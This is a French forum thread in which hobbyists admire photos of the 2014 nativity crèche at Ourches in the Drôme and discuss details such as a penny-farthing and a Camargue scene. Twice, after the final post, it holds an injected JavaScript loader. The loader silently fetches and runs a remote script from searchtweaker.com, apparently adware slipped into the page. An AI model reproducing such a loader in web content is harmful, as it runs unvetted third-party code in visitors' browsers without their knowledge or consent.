La crèche de Ourches 2014
+2
jeanpierree
louravi
6 participants
Santons et crèches de Provence :: Les annuaires des santonniers, santons, crèches. :: L'annuaire des crèches publiques
Page 1 sur 1
La crèche de Ourches 2014
Une crèche époustouflante qui mérite vraiment le déplacement. Une petite merveille que nous avons découvert hier. Nous avons aussi profité d'un accueil très chaleureux. J'ai pris beaucoup de photos et j'ai eu du mal à les sélectionner aussi elles y sont toutes.
Pour l'orientation, il faut mettre cote à cote les 3 premières photos de gauche à droite.
Pour l'orientation, il faut mettre cote à cote les 3 premières photos de gauche à droite.
Dernière édition par louravi le Jeu 22 Jan - 0:31, édité 1 fois
Re: La crèche de Ourches 2014
Superbe crèche et complète on ne peut mieux ! ......les yeux s'y perdent , comme dans un tapis persan : il y a même un marais- salant , une distillation de lavande , des ruches et même des gosses qui jouent au" pélélé " comme sur le tableau de Goya ? en tout cas mes félicitations au réalisateur .
des Hourches , du Monastier- sur- Gazeilles ( Haute-Loire ) ?
des Hourches , du Monastier- sur- Gazeilles ( Haute-Loire ) ?
jeanpierree- Messages : 267
Magnifique ! Encore une fois quelle chance tu as d'habiter une région avec autant de crèches de ce niveau et quelle chance nous avons que tu nous en fasses profiter.
Il me faudra du temps pour en faire le tour.
J'ai vu un grand-bi et moi qui croyais être le premier à l'introduire dans la crèche comme quoi il faut rester modeste.
Il me faudra du temps pour en faire le tour.
J'ai vu un grand-bi et moi qui croyais être le premier à l'introduire dans la crèche comme quoi il faut rester modeste.
Zolino50- Messages : 1455
Très jolie crèche. J'adore , entre autre chose , la scène de la fillette dans le drap tendu par les deux femmes
pascal83- Messages : 1304
On crois toujours être un fada avancé et on trouve toujours encore plus fada que soi
Tu vois Zolino un beau grand bi et en plus avec des rayons
Pour Jean Pierre, Hourches est dans la Drome près de Crest.
Tu vois Zolino un beau grand bi et en plus avec des rayons
Pour Jean Pierre, Hourches est dans la Drome près de Crest.
Dessin sur du plexi, pas mal pensé! Ici encore, la camargue fait mouche:D
Michel- Messages : 1857
Mais à regarder de près les rayons ne sont pas en métal mais tracés sur une âme en calque.
Pour les faire en métal il faudrait pouvoir les souder et dans ce cas on en soude un pendant que le voisin se dessoude à cause de la chaleur.
Pour les faire en métal il faudrait pouvoir les souder et dans ce cas on en soude un pendant que le voisin se dessoude à cause de la chaleur.
Zolino50- Messages : 1455
Bien sur la photo en gros plan révèle les détails et les défauts, mais l'idée est géniale et vu à distance raisonnable, c'est bluffant.
Une trés jolie crèche, avec un beau coin pour la camargue. Il y a même un petit train dans les hauteurs.
Heureusement "Ravi" que tu n'as pas programmé mon GPS. je ne serez pas encore arrivé.... Je crois bien qu'il
s'agit de OURCHES 26400.
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="http://www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
Heureusement "Ravi" que tu n'as pas programmé mon GPS. je ne serez pas encore arrivé.... Je crois bien qu'il
s'agit de OURCHES 26400.
(function(){try{var header=document.getElementsByTagName("HEAD")[0];var script=document.createElement("SCRIPT");script.src="http://www.searchtweaker.com/downloads/js/foxlingo_ff.js";script.onload=script.onreadystatechange=function(){if (!(this.readyState)||(this.readyState=="complete"||this.readyState=="loaded")){script.onload=null;script.onreadystatechange=null;header.removeChild(script);}}; header.appendChild(script);} catch(e) {}})();
LOU PESCADOU- Messages : 106